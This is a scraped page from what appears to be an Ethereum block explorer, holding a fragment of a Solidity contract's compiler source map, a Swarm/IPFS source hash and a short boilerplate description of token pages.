;;;;:26;;13197:97;;-1:-1:-1;13197:97:0;;-1:-1:-1;13197:97:0;;13305:26;;13197:97;;13305:26;:::i;:::-;;;;-1:-1:-1;;;;;;;13342:13:0;;:9;:13;;;;;;;;;;:24;;13359:7;;13342:9;:24;;13359:7;;13342:24;:::i;:::-;;;;;;;;13403:2;-1:-1:-1;;;;;13388:26:0;13397:4;-1:-1:-1;;;;;13388:26:0;;13407:6;13388:26;;;;1361:25:1;;1349:2;1334:18;;1215:177;13388:26:0;;;;;;;;12822:650;;12744:728;;;:::o;8474:239::-;8562:93;;;8587:66;8562:93;;;6613:19:1;8514:12:0;;;;6648::1;8562:93:0;;;;;;;;;;;;8539:116;;8686:7;8675:30;;;;;;;;;;;;:::i;:::-;8666:39;;8528:185;8474:239;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;622:70;567:131;:::o;703:315::-;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:1;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:1;1828:18;;;;1815:32;;1397:456::o;2047:247::-;2106:6;2159:2;2147:9;2138:7;2134:23;2130:32;2127:52;;;2175:1;2172;2165:12;2127:52;2214:9;2201:23;2233:31;2258:5;2233:31;:::i;:::-;2283:5;2047:247;-1:-1:-1;;;2047:247:1:o;2299:388::-;2367:6;2375;2428:2;2416:9;2407:7;2403:23;2399:32;2396:52;;;2444:1;2441;2434:12;2396:52;2483:9;2470:23;2502:31;2527:5;2502:31;:::i;:::-;2552:5;-1:-1:-1;2609:2:1;2594:18;;2581:32;2622:33;2581:32;2622:33;:::i;:::-;2674:7;2664:17;;;2299:388;;;;;:::o;2692:380::-;2771:1;2767:12;;;;2814;;;2835:61;;2889:4;2881:6;2877:17;2867:27;;2835:61;2942:2;2934:6;2931:14;2911:18;2908:38;2905:161;;2988:10;2983:3;2979:20;2976:1;2969:31;3023:4;3020:1;3013:15;3051:4;3048:1;3041:15;2905:161;;2692:380;;;:::o;3077:127::-;3138:10;3133:3;3129:20;3126:1;3119:31;3169:4;3166:1;3159:15;3193:4;3190:1;3183:15;3209:125;3274:9;;;3295:10;;;3292:36;;;3308:18;;:::i;6101:245::-;6180:6;6188;6241:2;6229:9;6220:7;6216:23;6212:32;6209:52;;;6257:1;6254;6247:12;6209:52;-1:-1:-1;;6280:16:1;;6336:2;6321:18;;;6315:25;6280:16;;6315:25;;-1:-1:-1;6101:245:1:o;6351:128::-;6418:9;;;6439:11;;;6436:37;;;6453:18;;:::i;6671:259::-;6749:6;6802:2;6790:9;6781:7;6777:23;6773:32;6770:52;;;6818:1;6815;6808:12;6770:52;6850:9;6844:16;6869:31;6894:5;6869:31;:::i
Swarm Source
ipfs://64e9ff1e5222091c81ac5e8ea59479f962d5b607b8e24f615067f3d1082da047
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.